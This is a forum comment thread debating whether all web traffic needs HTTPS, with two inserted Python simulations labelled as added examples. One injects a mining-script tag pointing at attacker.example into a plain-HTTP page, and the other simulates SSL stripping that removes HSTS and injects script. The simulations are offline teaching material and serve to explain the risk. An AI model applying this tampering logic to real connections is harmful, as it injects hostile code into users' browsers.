I agree. HTTPS is great, and definitely needed for a lot of things. But I don't need my cat pictures encrypted, I don't need lots of things encrypted, and frankly, I don't want it to be encrypted when it's not required; it's a waste of resources, both processing and network.
Then there is the case of all the old computers that either lack the processing power or support for modern algorithms.
If a page doesn't use HTTPS, even if it is cats, you cannot trust that the traffic has not been modified in transit. You try to load a cat but a network attacker can add malware or mining code or a worse exploit.
Every page needs HTTPS because you can't trust any content sent to you over HTTP. You don't know if it's "just a cat picture."
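To make the point in the two comments above concrete, here is an added example (not code from the thread) that simulates what an on-path attacker can do to a plain-HTTP response carrying a "just a cat picture" page. The origin page, the attacker's script URL and the host names are constructed for illustration; nothing touches the network.

```python
"""Tampering with a cleartext HTTP response in transit (simulated, offline).

Added example, not from the original thread. The origin page, the attacker
payload and the host names are constructed for illustration.
"""
import re


def build_response(body: bytes, content_type: bytes) -> bytes:
    """Build a minimal HTTP/1.1 200 response with a correct Content-Length."""
    return (b"HTTP/1.1 200 OK\r\n"
            b"Content-Type: " + content_type + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"\r\n" + body)


# Constructed: what the cat site's server puts on the wire over port 80.
ORIGIN_RESPONSE = build_response(
    b'<html><body><h1>Cats</h1><img src="/cat.jpg" alt="a cat"></body></html>',
    b"text/html; charset=utf-8")

# Constructed attacker payload: the "mining code" the comment above mentions.
PAYLOAD = b'<script src="http://attacker.example/miner.js"></script>'


def header_value(head: bytes, name: bytes) -> bytes:
    """Case-insensitive lookup of one header in the raw header block."""
    m = re.search(rb"(?im)^" + re.escape(name) + rb":[ \t]*([^\r\n]*)", head)
    return m.group(1).strip() if m else b""


def tamper(raw: bytes, payload: bytes) -> bytes:
    """What anyone between client and server (hotspot, ISP, transit router)
    can do to cleartext HTTP: splice a script into the HTML and fix up
    Content-Length so the browser sees a perfectly well-formed response."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep or not header_value(head, b"Content-Type").startswith(b"text/html"):
        return raw  # non-HTML could be swapped wholesale; this example only injects
    new_body = body.replace(b"</body>", payload + b"</body>", 1)
    new_head = re.sub(rb"(?im)^content-length:[^\r\n]*",
                      b"Content-Length: " + str(len(new_body)).encode(),
                      head, count=1)
    return new_head + b"\r\n\r\n" + new_body


def is_consistent(raw: bytes) -> bool:
    """The only check a plain-HTTP client can make: framing is self-consistent.
    It says nothing about whether the bytes are what the server sent."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return header_value(head, b"Content-Length") == str(len(body)).encode()


def script_sources(raw: bytes) -> list:
    """External scripts the browser would fetch and execute for this page."""
    _, _, body = raw.partition(b"\r\n\r\n")
    return [m.decode() for m in re.findall(rb'<script[^>]*\bsrc="([^"]*)"', body)]


if __name__ == "__main__":
    modified = tamper(ORIGIN_RESPONSE, PAYLOAD)
    print("original scripts:", script_sources(ORIGIN_RESPONSE))
    print("after tampering: ", script_sources(modified))
    print("framing still valid:", is_consistent(modified))
```

The modified response passes every check the client can run on its own; without TLS there is no reference the client can compare the bytes against, which is why "it's only a cat picture" is not an argument about the page but about every hop between you and it.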
They don't intentionally execute any code, but they do sometimes have a vulnerability that allows memory corruption in a way that can be exploited to run attacker-provided code.
If you're not familiar with this omnipresent class of exploit, I wouldn't hope for many people on HN to take your advice on whether a security measure is needed or not seriously. Even if your comments were underlined and flashing on the page instead of grayed out.
I'd be more receptive to this if ISPs weren't snooping on traffic and selling their customers' browsing history. As long as we have to operate under the assumption that every scrap of data we send or request will be picked apart and used against us whenever possible I'd rather encrypt everything and have a little less to worry about.
Sorry to burst your bubble, but intelligence agencies are going to be monitoring your traffic regardless. The Internet is a global network; laws in specific countries or economic zones don't affect data in transit through other parts of the world.
When there's executable code there needs to be encryption.
JS
HTML
CSS
WASM
etc
...all need to be tamper-resistant.
Processing power, meh. More of an issue is older devices not getting the updates to software for the newer algorithms, and not getting the updated certificates. I got rid of a perfectly good tablet for just this reason. A bit slow perhaps but workable.
You don't need your cat pictures encrypted per se, but you do want to ensure that your web portal cannot MITM your communications with catpictures.com and inject malicious JavaScript into the webpage.
In an adversarial situation, you also want your opponent to spend time and resources storing or cracking gigabytes of cat pictures for every kilobyte of email they get.
Here is the thing. If you enter domain.com into the address bar of your browser, your browser will always go to the http site unless you do HSTS preloading. Your first visit to a website is not secured by https. So lots of people do a http -> https redirect, which means you can do a man-in-the-middle attack on the http port and the HSTS header will never get loaded in the first place. https is significantly less effective than it should be.
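The first-visit problem described above, as an added simulation (not code from the thread): a browser with an HSTS cache, an origin that redirects port 80 to https and only sends Strict-Transport-Security over TLS, and an on-path attacker on the cleartext side that fetches the real page over TLS itself and relays it back stripped of the redirect and the HSTS header. The host names and the preload set are constructed; the model assumes the browser defaults to http for a bare host, as the comment describes, and ignores the HTTPS-first modes newer browsers offer.

```python
"""HSTS first-visit stripping, simulated offline.

Added example, not from the original thread. Hosts, the stand-in preload
list and the injected marker are constructed for illustration.
"""
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed stand-in for the browser's built-in HSTS preload list.
HSTS_PRELOAD = {"preloaded.example"}


@dataclass
class Response:
    scheme: str   # scheme over which the browser actually received this
    host: str
    status: int
    headers: dict
    body: str


class Origin:
    """Common deployment: port 80 only redirects; HSTS is only sent over TLS
    (browsers ignore the header on plain http anyway, per RFC 6797)."""

    def __init__(self, host: str):
        self.host = host

    def handle(self, scheme: str, path: str) -> Response:
        if scheme == "http":
            return Response("http", self.host, 301,
                            {"Location": f"https://{self.host}{path}"}, "")
        return Response("https", self.host, 200,
                        {"Strict-Transport-Security": "max-age=31536000"},
                        "<html><body>cats</body></html>")


class StrippingAttacker:
    """Sits on the path and sees only cleartext. TLS traffic passes through
    untouched (no valid certificate, so no way to read or modify it)."""

    def __init__(self, origin: Origin):
        self.origin = origin

    def handle(self, scheme: str, path: str) -> Response:
        if scheme == "https":
            return self.origin.handle("https", path)
        real = self.origin.handle("https", path)   # attacker talks TLS to origin
        headers = {k: v for k, v in real.headers.items()
                   if k.lower() != "strict-transport-security"}
        body = real.body.replace("</body>", "<script>/* injected */</script></body>")
        return Response("http", self.origin.host, 200, headers, body)


class Browser:
    def __init__(self):
        self.hsts = set(HSTS_PRELOAD)   # learned hosts are added here

    def navigate(self, host: str, network, path: str = "/") -> Response:
        scheme = "https" if host in self.hsts else "http"
        for _ in range(5):
            resp = network.handle(scheme, path)
            # HSTS is only honoured when it arrived over TLS.
            if resp.scheme == "https" and "Strict-Transport-Security" in resp.headers:
                self.hsts.add(resp.host)
            if resp.status in (301, 302, 307, 308):
                target = urlsplit(resp.headers["Location"])
                scheme, host, path = target.scheme, target.hostname, target.path or "/"
                if host in self.hsts:
                    scheme = "https"
                continue
            return resp
        raise RuntimeError("too many redirects")


def first_visit_with_attacker():
    """Fresh browser, attacker present from the start: never sees https."""
    origin = Origin("domain.example")
    b = Browser()
    r = b.navigate("domain.example", StrippingAttacker(origin))
    return r.scheme, "domain.example" in b.hsts, "injected" in r.body


def clean_first_visit_then_attacker():
    """Once HSTS was learned over a clean connection, stripping fails."""
    origin = Origin("domain.example")
    b = Browser()
    r1 = b.navigate("domain.example", origin)
    r2 = b.navigate("domain.example", StrippingAttacker(origin))
    return r1.scheme, "domain.example" in b.hsts, r2.scheme, "injected" in r2.body


def preloaded_first_visit():
    """Preloaded host: the first request already goes out over TLS."""
    origin = Origin("preloaded.example")
    b = Browser()
    r = b.navigate("preloaded.example", StrippingAttacker(origin))
    return r.scheme, "injected" in r.body


if __name__ == "__main__":
    print(first_visit_with_attacker())        # ('http', False, True)
    print(clean_first_visit_then_attacker())  # ('https', True, 'https', False)
    print(preloaded_first_visit())            # ('https', False)
```

The three scenarios show the window the comment is talking about: the protection only exists after one untampered https visit, or from the first request if the host is on the preload list. A quick way to check a real site's situation is to look at whether it is in the preload list (hstspreload.org) and whether its https response carries a Strict-Transport-Security header with a large max-age.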
What makes it more expensive? A certificate is free (with LE or self-signed), the performance impact is negligible and there's a clear reason for why everyone should be using it.
It does add a "tax" of sorts in the form of time or attention that must be paid to keep a website up. You can't just sling some files in a directory and be done -- you have to pay for certificates or pay (in time and executable capability) to keep LetsEncrypt up to date.
And, as wonderful as LetsEncrypt is, it's not forever. At some point, they're gonna get tired of messing with it or it will get taken over by private equity (see .org) and for whatever reason, it won't work any more.
And sure, that's always been true, new stuff obsoletes old and things fall by the wayside. But my current browser can access modern websites as well as sites from the dawn of the Web. But Firefox 85, 87 or 90 will probably make https mandatory -- and that amazing continuity is gone.
You cannot say that certificates are reliably free (especially in the long run), if there's only one entity providing them and that entity is dependent on corporate sponsors.
Tons of major websites rely on Let's Encrypt, so I think it's fair to say that they're probably not going anywhere soon. Free certificates are now standard on services like Cloudflare and Google App Engine. I think that AWS can generate free ones too.
It's part of the culture of making everything web terribly complicated, which has resulted in the death of all but three web browsers.
It's now practically impossible to write a new web browser from scratch, unless you're a mega corp with endless resources and a grudge against Google, and they're still adding more complexity every day.
The web started out as a very optimistic project with no security and a lot based on trust. As it evolved a lot of security had to be bolted on which now makes it a bit more complicated than in the early days. But what's the alternative?
Of course a perfect protocol where nothing needs to be added later would be great, but that's not very realistic.
The problem isn't just HTTPS, it's the ever-expanding array of various APIs and technologies that "must" be implemented to be a "real" or "complete" browser. Even Firefox, which has been around for a long time and has a fairly large mind share, is at best an afterthought in many web projects.
The number of APIs that need to be implemented to be considered even a basic web browser is so huge that it's not an approachable project for just about any organization, and as an individual it's just not possible.
Gemini is a monoculture. They almost say it in the FAQ:
> 2.5 Why not just use a subset of HTTP and HTML?
> [...] The problem is that deciding upon a strictly limited subset of HTTP and HTML, slapping a label on it and calling it a day would do almost nothing to create a clearly demarcated space where people can go to consume only that kind of content in only that kind of way. [...]
The protocol itself has very strong opinions on what is allowed and what is not. It is simple but mandates TLS (so, not simple), because authors think encryption is important but other things are not. It is also deliberately non-extensible.
Not saying it is a bad thing, I mean, they didn't hurt anyone. But that protocol is clearly intended as a rallying point for like-minded individuals rather than something for everyone to use.